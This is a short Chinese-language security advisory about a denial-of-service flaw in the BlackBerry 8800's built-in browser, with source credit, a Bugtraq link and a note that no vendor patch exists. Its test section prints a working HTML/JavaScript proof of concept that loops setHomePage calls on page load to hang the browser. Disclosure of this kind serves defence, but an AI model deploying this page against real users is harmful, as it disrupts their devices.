受影响系统:
RIM BlackBerry 8800
描述:
BlackBerry 8800是一款流行的智能手机。
BlackBerry 8800手机内嵌的浏览器中存在拒绝服务漏洞,远程攻击者可以利用通过使用setHomePage方式和DHTML行为属性配置主页的JavaScript循环导致浏览器挂起。
<*来源:MustLive (mustlive@websecurity.com.ua)
链接:http://marc.info/?l=bugtraq&m=125778617727776&w=2
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<title>Internet Explorer DoS Exploit (C) 2009 MustLive. http://websecurity.com.ua</title>
<script>
function DoS() {
document.getElementById("dos").click();
setTimeout(DoS,1);
}
</script>
</head>
<body onload="DoS()">
<div align="center"><a id="dos" href="#" onClick="this.style.behavior=’url(#default#homepage)’;this.setHomePage(‘http://websecurity.com.ua’)"> !</a></div>
</body>
</html>
建议:
厂商补丁:
RIM
—
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。